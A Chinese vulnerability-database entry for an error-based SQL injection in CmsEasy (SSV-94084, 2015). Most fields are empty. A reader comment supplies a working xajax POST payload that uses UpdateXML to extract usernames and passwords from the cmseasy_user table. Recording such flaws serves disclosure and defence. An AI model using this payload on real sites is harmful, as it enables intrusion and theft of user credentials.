cmseasy 无限制报错注入(php函数的坑)

基本字段

漏洞编号:
SSV-94084
披露/发现时间:
2015-08-26
提交时间:
2015-08-26
漏洞等级:
漏洞类别:
其他类型
影响组件:
CmsEasy
漏洞作者:
menmen519
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB
Loading icon
共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 1788
评论前需绑定手机 现在绑定

全部评论 (1)

  • 真.payload xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
    1F

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负